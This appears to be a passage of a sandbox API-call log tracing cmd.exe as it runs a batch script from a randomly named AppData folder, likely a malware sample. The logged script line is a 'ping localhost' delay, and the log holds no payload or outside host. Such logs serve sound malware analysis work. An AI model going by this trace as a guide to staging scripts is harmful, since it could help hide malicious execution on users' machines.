lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x0, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x1, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x1, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x0, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x40, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x40, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x40, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.413] RegCloseKey (hKey=0x40) returned 0x0 [0175.413] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e71c | out: phkResult=0x14e71c*=0x40) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x40, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x1, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x1, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x0, lpcbData=0x14e720*=0x4) returned 0x0 [0175.413] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x9, lpcbData=0x14e720*=0x4) returned 0x0 [0175.414] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x4, lpData=0x14e728*=0x9, lpcbData=0x14e720*=0x4) returned 0x0 [0175.414] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e724, lpData=0x14e728, lpcbData=0x14e720*=0x1000 | out: lpType=0x14e724*=0x0, lpData=0x14e728*=0x9, lpcbData=0x14e720*=0x1000) returned 0x2 [0175.414] RegCloseKey (hKey=0x40) returned 0x0 [0175.414] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638b [0175.414] srand (_Seed=0x5b88638b) [0175.414] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd\"" [0175.414] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd\"" [0175.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.414] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1619b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0175.414] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.414] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.414] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0175.414] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.414] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.414] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0175.414] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0175.414] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0175.415] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0175.415] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0175.415] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0175.415] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0175.415] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0175.415] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f4e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.415] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f4e8, lpFilePart=0x14f4e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f4e4*="Desktop") returned 0x18 [0175.415] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.415] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f264 | out: lpFindFileData=0x14f264) returned 0x15ffe0 [0175.415] FindClose (in: hFindFile=0x15ffe0 | out: hFindFile=0x15ffe0) returned 1 [0175.415] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f264 | out: lpFindFileData=0x14f264) returned 0x15ffe0 [0175.415] FindClose (in: hFindFile=0x15ffe0 | out: hFindFile=0x15ffe0) returned 1 [0175.415] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f264 | out: lpFindFileData=0x14f264) returned 0x15ffe0 [0175.415] FindClose (in: hFindFile=0x15ffe0 | out: hFindFile=0x15ffe0) returned 1 [0175.416] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.416] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0175.416] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0175.416] GetEnvironmentStringsW () returned 0x160150* [0175.416] FreeEnvironmentStringsW (penv=0x160150) returned 1 [0175.416] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.418] GetConsoleOutputCP () returned 0x1b5 [0175.418] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.418] GetUserDefaultLCID () returned 0x409 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f628, cchData=128 | out: lpLCData="0") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f628, cchData=128 | out: lpLCData="0") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f628, cchData=128 | out: lpLCData="1") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0175.418] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0175.419] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0175.419] GetConsoleTitleW (in: lpConsoleTitle=0x1601e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.419] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.419] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0175.420] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0175.420] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0175.423] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd", _String2=")") returned 58 [0175.423] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 3 [0175.423] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 3 [0175.423] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 6 [0175.423] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 6 [0175.423] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 15 [0175.423] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd") returned 15 [0175.423] GetConsoleTitleW (in: lpConsoleTitle=0x14f320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.424] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f0dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f0d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f0d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0175.424] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0175.424] SetErrorMode (uMode=0x0) returned 0x0 [0175.424] SetErrorMode (uMode=0x1) returned 0x0 [0175.424] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x16dc08, lpFilePart=0x14ee40 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x14ee40*="vMfCCeRYkvQy") returned 0x2d [0175.424] SetErrorMode (uMode=0x0) returned 0x1 [0175.424] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0175.425] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.428] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.428] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd", fInfoLevelId=0x1, lpFindFileData=0x14ebdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ebdc) returned 0x1608f0 [0175.428] FindClose (in: hFindFile=0x1608f0 | out: hFindFile=0x1608f0) returned 1 [0175.428] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0175.428] GetConsoleTitleW (in: lpConsoleTitle=0x14f0b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.429] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0175.432] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0175.432] IdentifyCodeAuthzLevelW () returned 0x1 [0175.439] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0175.439] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0175.440] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0175.440] CloseCodeAuthzLevel () returned 0x1 [0175.440] SetErrorMode (uMode=0x0) returned 0x0 [0175.440] SetErrorMode (uMode=0x1) returned 0x0 [0175.440] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd", nBufferLength=0x104, lpBuffer=0x1604e8, lpFilePart=0x14efa0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd", lpFilePart=0x14efa0*="CbFFjy09.cmd") returned 0x3a [0175.440] SetErrorMode (uMode=0x0) returned 0x1 [0175.440] CmdBatNotification () returned 0x0 [0175.440] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\cbffjy09.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14efe4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0175.440] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0175.440] _get_osfhandle (_FileHandle=3) returned 0x58 [0175.440] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.440] _get_osfhandle (_FileHandle=3) returned 0x58 [0175.440] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.440] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14efc8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x14efc8*=0x91, lpOverlapped=0x0) returned 1 [0175.441] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0175.441] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0175.441] _get_osfhandle (_FileHandle=3) returned 0x58 [0175.441] GetFileType (hFile=0x58) returned 0x1 [0175.441] _get_osfhandle (_FileHandle=3) returned 0x58 [0175.441] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0175.442] _wcsicmp (_String1="ping", _String2=")") returned 71 [0175.442] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0175.442] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0175.442] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0175.442] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0175.442] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0175.442] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0175.443] _tell (_FileHandle=3) returned 21 [0175.443] _close (_FileHandle=3) returned 0 [0175.443] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ed9c | out: _Buffer="\r\n") returned 2 [0175.443] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.443] GetFileType (hFile=0x7) returned 0x2 [0175.443] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.443] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed5c | out: lpMode=0x14ed5c) returned 1 [0175.443] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.443] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ed88, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ed88*=0x2) returned 1 [0175.443] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0175.443] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.443] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed98 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0175.444] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x14ed98 | out: _Buffer=">") returned 1 [0175.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.444] GetFileType (hFile=0x7) returned 0x2 [0175.444] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.444] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed60 | out: lpMode=0x14ed60) returned 1 [0175.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.444] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x14ed8c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x14ed8c*=0x19) returned 1 [0175.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.444] GetFileType (hFile=0x7) returned 0x2 [0175.444] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.444] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efe4 | out: lpMode=0x14efe4) returned 1 [0175.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.444] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x160958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14f010, lpReserved=0x0 | out: lpBuffer=0x160958*, lpNumberOfCharsWritten=0x14f010*=0x4) returned 1 [0175.445] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f01c | out: _Buffer=" -n 3 localhost ") returned 16 [0175.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.445] GetFileType (hFile=0x7) returned 0x2 [0175.445] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.445] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efdc | out: lpMode=0x14efdc) returned 1 [0175.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.445] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14f008, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f008*=0x10) returned 1 [0175.445] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f03c | out: _Buffer="\r\n") returned 2 [0175.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.445] GetFileType (hFile=0x7) returned 0x2 [0175.445] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.445] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14effc | out: lpMode=0x14effc) returned 1 [0175.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.445] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f028, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f028*=0x2) returned 1 [0175.446] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0175.446] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0175.446] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0175.446] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0175.446] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0175.446] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0175.446] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0175.446] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0175.446] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0175.446] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0175.446] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0175.446] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0175.446] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0175.446] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0175.446] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0175.446] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0175.446] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0175.446] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0175.446] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0175.446] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0175.446] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0175.446] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0175.446] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0175.446] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0175.446] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0175.446] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0175.446] _wcsicmp (_String1="ping", _String2="START") returned -3 [0175.446] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0175.446] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0175.446] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0175.446] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0175.446] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0175.446] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0175.446] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0175.446] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0175.446] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0175.447] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0175.447] SetErrorMode (uMode=0x0) returned 0x0 [0175.447] SetErrorMode (uMode=0x1) returned 0x0 [0175.447] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x170550, lpFilePart=0x14ede0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14ede0*="Desktop") returned 0x18 [0175.447] SetErrorMode (uMode=0x0) returned 0x1 [0175.447] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.447] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0175.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.447] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x14eb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb5c) returned 0xffffffff [0175.448] GetLastError () returned 0x2 [0175.448] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x14eb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb5c) returned 0xffffffff [0175.448] GetLastError () returned 0x2 [0175.448] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x14eb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb5c) returned 0x170838 [0175.448] FindClose (in: hFindFile=0x170838 | out: hFindFile=0x170838) returned 1 [0175.448] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x14eb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb5c) returned 0xffffffff [0175.448] GetLastError () returned 0x2 [0175.448] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x14eb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb5c) returned 0x170838 